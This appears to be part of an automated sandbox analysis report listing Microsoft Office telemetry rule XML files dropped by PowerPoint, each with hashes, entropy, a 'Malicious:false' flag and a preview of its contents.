                                                                                                                              Entropy (8bit):5.167435603528131
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dtfB2dRgewrlywDnz/rhOEe4ECIn+LdRrz:ctp6RgewiEe4hI+LdRH
                                                                                                                              MD5:69627ED112C3E07DA126859950E875F5
                                                                                                                              SHA1:E00A20A8BF5C9FE7093575E7359E8233C876FCD9
                                                                                                                              SHA-256:312D7F3791122E568A150E3ABAF6C66D2EBC45E3F27E53F8E55E496E43F48E25
                                                                                                                              SHA-512:21A6F01C2C64CEC9776C133597682E482C0C424AF6992FFBA367FDB4217082566D068EF9047D320B4A1345A7FAC60D2CBFAF5AA1E8945E5FEAE833B020535AB6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11502" V="0" DC="SM" EN="Office.Outlook.Desktop.LinkedInBinding.DetailsOfUnexpectedIdpAuthInBindServiceToProfile" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="10" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bzt52" />.. </S>.. <C T="W" I="0" O="false" N="IdentityErrorState">.. <S T="1" F="IdentityMetadata_IdentityErrorState" />.. </C>.. <C T="W" I="1" O="false" N="IdentityProviderType">.. <S T="1" F="IdentityMetadata_IdentityProviderType" />.. </C>.. <C T="B" I="2" O="false" N="IsPersisted">.. <S T="1" F="IdentityMetadata_IsPersisted" />.. </C>.. <C T="B" I="3" O="false" N="IsSignedOut">.. <S T="1" F="IdentityMetadata_IsSignedOut" />.. </C>.. <C T="W" I="4" O="false" N="LibraryType">.. <S T="1" F="IdentityMetadata_LibraryType" />.. </C>.. <C T="W" I="5" O="false" N="ServicePrefix">.. <S T="1" F="ServicePrefix" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1101
                                                                                                                              Entropy (8bit):5.017793697630464
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dL3J62sdRgeyxvVrn2rJrMrNoBOOrkGgF2rkIZF+:cL3k28RgeyxvVKtAR6xwGgowIZF+
                                                                                                                              MD5:8B6CC2C79AB285EA2365945B6EA148CC
                                                                                                                              SHA1:3B5899C298529045F8D7FEBDC616FD5A6F5C1BFA
                                                                                                                              SHA-256:909D0919C458765004D922B096EE543DDD3BDD9DC9A232475A144C3BD0D248B5
                                                                                                                              SHA-512:486A750A5DBDA5DDE053CE6CA496843D83C6F9DD6CBD14D5E40517AA11EEFBE4DC1F7AA01B7272132140152F330758E6D3618571633E4909F45F3530A92EE43A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11504" V="0" DC="SM" EN="Office.Outlook.Desktop.LinkedInBinding.PreSignIn.CountFailuresPreparingBinding" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <TI T="1" I="Daily" />.. <A T="2" E="TelemetryShutdown" />.. <UTS T="3" Id="bzt52" />.. <UTS T="4" Id="b0h36" />.. <UTS T="5" Id="b0h4c" />.. <UTS T="6" Id="b0h4e" />.. </S>.. <C T="U32" I="0" O="false" N="CountUnexpectedIdpAuthInBindServiceToProfile">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="CountNullIdentityInAddBindingService">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="CountNullIdentityInDisplayBindingSignInDialog">.. <C>.. <S T="5" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="CountUnexpectedExceptionInDisplayBindingSignInDialog">.. <C>.. <S T="6" />.. </C>.. </C>.. <T>.. <S T="1" />.. <S T="2" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6785
                                                                                                                              Entropy (8bit):4.393023802643219
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:llRgeZHnmf6gagmWrn+YaF8+pusa7LlrC0QFzInWbt2374BbKy5:rDZH0tQp/e3374BbKy5
                                                                                                                              MD5:A0F309AEAC31747BDAA138E09976C01E
                                                                                                                              SHA1:93DB840FFCB337B866FAAF50661D1B669194684F
                                                                                                                              SHA-256:FEDF8BCA4585163F904C6B3DAB5AF4C2252190E98C8356244C539B8FA193CDED
                                                                                                                              SHA-512:8A09BF31A72B12F4356E74B0871AA3E2CAF6CEC5437F968BB7CA88445A44DE1EBF3152BBB28B20A44CF65206FC20951B3BC69C17DE3F55FC35960A7E6E19F4FD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11514" V="1" DC="SM" EN="Office.Outlook.Desktop.PCXContactCard2LinkedInUsageAndHealth" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="blelm" />.. <UTS T="4" Id="b5ze7" />.. <UTS T="5" Id="b5ze8" />.. <UTS T="6" Id="b5zez" />.. <UTS T="7" Id="b5ze0" />.. <UTS T="8" Id="b5ze1" />.. <UTS T="9" Id="b5ze2" />.. <UTS T="10" Id="b3g8x" />.. <UTS T="11" Id="bsexb" />.. <F T="12">.. <O T="EQ">.. <L>.. <S T="4" F="AssociationFooterState" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. <F T="13">.. <O T="EQ">.. <L>.. <S T="4" F="AssociationFooterState" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <F T="14">.. <O T="EQ">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):428
                                                                                                                              Entropy (8bit):5.3112013575014405
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdGDVzjon7dRDDHwpat5lkB9Je1zVhEXMNO2su:2dGDEdRge7E9fXk
                                                                                                                              MD5:87D41D382120A6802A3BB2958687B53D
                                                                                                                              SHA1:2951AABC5380E524126A94385E6F72B281859552
                                                                                                                              SHA-256:12571CFDF73A7408D3D31D386E2572D1AC9BA843F3D67346496266E4F1EA990E
                                                                                                                              SHA-512:A4365C6951D987F124A6B089EF965DCFBD2C36CEA2A6C882C1B074A7E226B73DCF3EBEA7D4C05178BE8EF1688497F9857A37765C4FFC7520EAEBD7EDF0F38607
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11659" V="0" DC="SM" EN="Office.Outlook.Desktop.Pst.BestBodyMarch2018" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="8" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="2001" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. </S>.. <C T="B" I="0" O="false" N="Enabled">.. <S T="1" F="Enabled" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1129
                                                                                                                              Entropy (8bit):5.140935693060115
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dRV6dRgetvroWrxrorVAquDT2DTZ1If7:cRV2RgetvsWNkXIf7
                                                                                                                              MD5:33F29D9D773542AB05C2A725A5AEBBD6
                                                                                                                              SHA1:31275F20A0D0D7B1538AD3D4B7C1D4136F3B44CD
                                                                                                                              SHA-256:DE1FD2D5D06581EA0CE4C315E27B7EC0B63B5B036B1D6015297B1E72B9A482FC
                                                                                                                              SHA-512:DE6D6C3F93795F6D58766A74CDFC8B374FF975EDD62720CC54C2D96D3529F01716CC56D18148E1B10AAE7E78D2EDC6017ABE0486B5B12F49FEF305B153CEA3C5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11701" V="1" DC="SM" EN="Office.Outlook.Desktop.Lpc.LokiOutboundEvents" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="1000" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b3g8r" />.. <UTS T="2" Id="b3g8s" />.. <UTS T="3" Id="9rfv2" />.. <SR T="4" R="(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)-(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)">.. <S T="1" F="CorrelationId" />.. </SR>.. </S>.. <C T="W" I="0" O="false" N="RequestUrl">.. <S T="1" F="RequestUrl" />.. </C>.. <C T="U32" I="1" O="false" N="HttpStatus">.. <S T="1" F="HttpStatus" />.. </C>.. <C T="W" I="2" O="false" N="CorrelationId">.. <S T="4" F="Matched" />.. </C>.. <C T="U32" I="3" O="true" N="Milliseconds">.. <S T="2" F="Milliseconds" />.. </C>.. <C T="U32" I="4" O="true" N="ResponseSize">.. <S T="2" F="ResponseSize" />.. </C>.. <C T="U32" I="5" O="fal
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3171
                                                                                                                              Entropy (8bit):4.706340035425865
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:clERge5v4JIBY1U2ehBcYF9HRgs8Hr/Xs:JRge5hgzrfs
                                                                                                                              MD5:D15475174EE7DB434C43EC8ED48B0373
                                                                                                                              SHA1:6E1DEE8F9B3F932EBE3BA55BE39AE42161E09054
                                                                                                                              SHA-256:8B333E949A2A85F70EFE1E46A81E631039671D6A1D8498106D325228C0203EC4
                                                                                                                              SHA-512:90C823BC439314FFDEA79ADCF33999ACC9608C26072095711BB57A0A615F7F396F292438BC52DA25E91697AB85A91F98394CAF402CA86CC7E630F32828158D05
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11705" V="1" DC="SM" EN="Office.Outlook.Desktop.Lpc.LinkedInBindWorkflow" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" SP="CriticalUsage" S="100" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cmpda" />.. <UTS T="2" Id="cfzmw" />.. <UTS T="3" Id="cfzms" />.. <UTS T="4" Id="cfzmp" />.. <UTS T="5" Id="cfzmr" />.. <UTS T="6" Id="cfzmt" />.. <UTS T="7" Id="cfzmu" />.. <UTS T="8" Id="cfzmv" />.. <UTS T="9" Id="cfzqn" />.. <UTS T="10" Id="bd7ah" />.. <UTS T="11" Id="b3g8x" />.. <SR T="12" R="error=(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)(.|)">.. <S T="8" F="ErrorDescription" />.. </SR>.. <SR T="13" R="error_description=AADSTS([^@]|)([^@]|)([^@]|)([^@]|)([^@]|)([^@]|)([^@]|)([^@]|)([^@]|)%3a">.. <S T="8" F="ErrorDescription" />.. </SR>.. </S>.. <C T="W" I="0" O="false" N="Bind
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):631
                                                                                                                              Entropy (8bit):5.23021248178263
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaVzjw+dRDDHwpatUclPJe1zbhxBHOTWHyn/apx4MNO2su:2daC+dRgeUc98hXHqWHMk
                                                                                                                              MD5:5A8A41CEE56BDDE6EA382C24CEA91908
                                                                                                                              SHA1:95F861FDE1A01A29E3883218935D7543ADFE047A
                                                                                                                              SHA-256:0667A234151FF3EA3F1E955206C4E2BAB64C4A9B0283171A6F4BDE4AEC971DAD
                                                                                                                              SHA-512:7230661E9578C1B4BA6A94B45B0B3F1BCD8F2C9EDC93304F3717F21C2229B31D549E5BBED84216DD24610F83B6DB6838DBDBC3B078CD9E8756F91CABC86F319C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11710" V="0" DC="SM" EN="Office.Outlook.Desktop.NdbCorruptionResult" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" SP="CriticalUsage" S="50" DL="B" DCa="PSP" xmlns="">.. <S>.. <Etw T="1" E="368" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. </S>.. <C T="W" I="0" O="false" N="ReportingProcess">.. <S T="1" F="Process" />.. </C>.. <C T="B" I="1" O="false" N="CreateNewFile">.. <S T="1" F="CreateNew" />.. </C>.. <C T="U32" I="2" O="false" N="Consumers">.. <S T="1" F="Consumers" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2649
                                                                                                                              Entropy (8bit):3.802109708779993
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2derVrumt4ZPjqTZ2DCNlwOaZ2DCdJZ2DCgz2DiPX2Diq/2DC0PWxVHnPWl9XVlQ:cehymt4tqTnQdJgCt9Xp
                                                                                                                              MD5:B566F6C2DA0CF8CB9E711C9588F76ACE
                                                                                                                              SHA1:61A26EE38863A45186779F55F779B6C1FDB66069
                                                                                                                              SHA-256:B41138BA164326EA1A2F2D7C8DDE4182FA69AC9687D7ABBB6502236FA1F8577F
                                                                                                                              SHA-512:1225F1FE1C4D1851CF3EE75D2EEC78588EBC33BAAE58FBCE55A5BF65C9D049E70B413E49AD40D89FB130D4E0ADF3F4056CBE8709E7E320BC0E573AB109903E06
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11767" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmz0a" />.. <UTS T="2" Id="bmz0b" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="RequestSuccess" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="HttpStatus" />.. </L>.. <R>.. <V V="401" T="U32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="2" F="HttpStatus" />.. </L>.. <R>.. <V V="403" T="U32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="2" F="HttpStatus" />.. </L>.. <R>.. <V V="404" T="U32" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="2"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2153
                                                                                                                              Entropy (8bit):3.605188552555672
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dULuQfXAt4yfXr5+7teoZ4e+FneC1PL4e0j5eAOeD:cOu2XAt4AXr5bj2z
                                                                                                                              MD5:867D74FB75E911F06808693D549FC57A
                                                                                                                              SHA1:E803911A4E5CB8016973839CFFDDB18E51998C3D
                                                                                                                              SHA-256:2648C260B56EEABD9ACB4AEFE1501700712180A0517781D5F30FA0C46F1E7960
                                                                                                                              SHA-512:8E4EC68AA57ADB1881CF1EF5A652E9B3FF3F7BE95E911CC3192676B87A854FC9CD4D97EE2B9BE98C255E7852E56CD623C638E53F20EEA48D39F58B7B2AE36C61
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11768" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="11767" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="4" T="I32" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="4" T="I32" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="2">.. <F N="0" />.. <F N="1" />.. </S>.. <S T="3">.. <F N="0" />.. <F N="1" />.. </S>.. </G>.. <C T="W" I="0" O="true">.. <S T="2" F="1" />.. </C>.. <C T="U32" I="1" O="true">.. <O T="ADD">.. <L>.. <A T="MAX">.. <S T="2" F="3" />.. </A>.. </L>.. <R>.. <A T="MAX">.. <S T="3" F="3" />.. </A>.. </R>.. </O>.. </C>.. <C T="U32" I="2" O="true">.. <O T="ADD">.. <L>.. <A T="MAX">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2798
                                                                                                                              Entropy (8bit):4.187029908716092
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d2WsdRge8DvS8fbwOdIybGbkvbCbNvQe8LL8X1QJ5EcB7:c2JRge0vS8zgwU8gNE8lFQ
                                                                                                                              MD5:651E78EAD579D2DC36429D12024DE5C2
                                                                                                                              SHA1:E27CBE0E5DADB0485382F0301415994EDC7A5A77
                                                                                                                              SHA-256:26BCA3417BC3B40E8EFCCC69433E5EAEF09018D90D6719FE1ECAE6AF5923F1DC
                                                                                                                              SHA-512:25898DAD0AC61D507A8A36C8246CB9C3E58469C4D0A547AC57FBDA738BD840B495FD57880B24730A1D5C102B8706D67061AB2629C06B6140C7821DFDB94848CD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11769" V="0" DC="SM" EN="Office.Outlook.Desktop.PcxAndOsfHttpStatus" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="11768" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="GE">.. <L>.. <S T="1" F="1" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="LE">.. <L>.. <S T="1" F="1" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="GE">.. <L>.. <S T="5" F="2" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="GE">.. <L>.. <S T="5" F="3" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4634
                                                                                                                              Entropy (8bit):4.601125821968251
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cge8jRgeLWvS8UNwR7dOhJz+701RsrMo7:a8jRgeCbUNwR7dOHry7
                                                                                                                              MD5:07D1624FEEC8E1CBC56C4805F2CFC1AF
                                                                                                                              SHA1:8E2C491B2D4BAFF981B8952110F8683B3EB815AD
                                                                                                                              SHA-256:225EDF6F7FDEDC1FF49C540A2435D033F1253BC25B31E808C3E4DB4ABC33D9EB
                                                                                                                              SHA-512:883B3B426AFDF05B8DF2AAE1F6BECCECA1EBA9A0032BAE5D10A0D39A939B17779DD362E4D9045E6BD874FDACF4682BE7C770DE6827FFBE3C39F940525B7477D4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11770" V="0" DC="SM" EN="Office.Outlook.Desktop.PeopleSearchResultsReturned" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cu5of" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="GE">.. <L>.. <S T="1" F="TotalResultsFound" />.. </L>.. <R>.. <V V="1" T="I32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>.. <O T="LE">.. <L>.. <S T="1" F="TotalResultsFound" />.. </L>.. <R>.. <V V="0" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="GE">.. <L>.. <S T="1" F="UnfinishedSources" />.. </L>.. <R>.. <V V="1" T="I32" />.. </R>.. </O>.. </R>.. </O>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7262
                                                                                                                              Entropy (8bit):4.292942473815119
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:1RgegbwwwYwHA1yfiKqLAqrUmYuAbL+hWGL4Hf7:1Dgq1ycGL4/7
                                                                                                                              MD5:E92DB98E314911DA51E04EFA313C4DC6
                                                                                                                              SHA1:25A1988C58C2273ABFFE9D8039529370102BCD29
                                                                                                                              SHA-256:678AA0A18F44A65DA8B857B58BD45E8A69D0B8026287A25C7BFF5DBC7866352F
                                                                                                                              SHA-512:3E5588B7D2F6547CCBD5366099D512292F6ECE837C9BD109CF9BB617785EE5287A179EB9CED2E601CA853545E4270AB92CAAB786F95C4912BA829668B7804CFD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11771" V="0" DC="SM" EN="Office.Outlook.Desktop.PeopleSuggestionsSessions" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cwfnj" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="SelectionMade" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="StringLength" />.. </L>.. <R>.. <V V="0" T="I32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="4" F="StringLength" />.. </L>.. <R>.. <V V="1" T="I32" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="EQ">.. <L>.. <S T="4" F="StringLength" />.. </L>.. <R>.. <V V="2
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7022
                                                                                                                              Entropy (8bit):3.789256707640678
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:wRgenbY5CH/dKfF9feKHg+CjrQP87tPzu7:wDnihGtLu7
                                                                                                                              MD5:E847D7DF616B3A0E027DE6EB8E6FF235
                                                                                                                              SHA1:8EC93455D7C15AB5F896CB730E39F9B752F41313
                                                                                                                              SHA-256:E2564AB6A484A9753453B93E173844D3FF3CE794BF3A28F39557CDBED1E2223E
                                                                                                                              SHA-512:AB46DC4E28905E04036D72CD1C26B7D9FE24605A66F388A9954F201662A6CD0A62C470836E0A5C451A4CC8B7A597FE8526AE1E6CF1A2509250C53BA751C39E56
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11792" V="1" DC="SM" EN="Office.Outlook.Desktop.PeopleSuggestionsDisplayTimes" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="cwfnh" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="IsFirstInSession" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="LT">.. <L>.. <S T="4" F="ElapsedMsForSession" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="4" F="ElapsedMsForSession" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1217
                                                                                                                              Entropy (8bit):4.65026027684882
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dV5nx6dRgeLr3vS8dbwOa71EeEgFwEcF4ES7:cV5nx2RgeLLvS8hQ8S7
                                                                                                                              MD5:DA668269FEE0A29C7ECCDE1A0358FB99
                                                                                                                              SHA1:DE01DCF29DF053044E4DE5B30AA623AA8F8DA6C5
                                                                                                                              SHA-256:C7F732A8FA1233F261CEC481AB65B93456EE6D9B55B2956E728BEC4A8DBDE070
                                                                                                                              SHA-512:6C3AA373E3AFB4ABF2CF3A5BDA35C3C03CF010C515061591175442ED76ACFF51DBFD8A823EDF7050BFC80FA8508749BBF20E4C8EE6FBD63A7AE18AFF11BC5D3D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11793" V="0" DC="SM" EN="Office.Outlook.Desktop.PeopleSuggestionsSearchStats" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cwfni" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="GE">.. <L>.. <S T="1" F="Suggestions" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="Suggestions" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="CountSearches">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="CountSearchesWithSuggestions">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="CountSearchesWithoutSuggestions">.. <C>.. <S T="5" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1382
                                                                                                                              Entropy (8bit):3.6365736385425627
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dsrXhomuyaPkI3t41ST1lwOa1XOP4POsPv0x8:csFomuyab3t4QTDQ/
                                                                                                                              MD5:E52549C1D1538EDCA8579CBD6609F2EB
                                                                                                                              SHA1:CF9C6D726FC627F576C026F782A09E98FB390502
                                                                                                                              SHA-256:4DE0A3F26DE982FD5930E5F250B545EF928F7D3C63B542E582D287BBD1A57AC2
                                                                                                                              SHA-512:73447D460ACC793630EE22095729CB6E6F34B94455417D52FBC02E030091F1BD7D1D8BCF106D07D2259B7CF443CCBA1E3CA7195C74659FBCFF81FDBB89559DF9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11794" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="by7xb" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="valueName" />.. </L>.. <R>.. <V V="DefaultIMApp" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="data" />.. </L>.. <R>.. <V V="Communicator" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="data" />.. </L>.. <R>.. <V V="Lync" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="2" F="data" />.. </L>.. <R>.. <V V="Teams" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="data" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1403
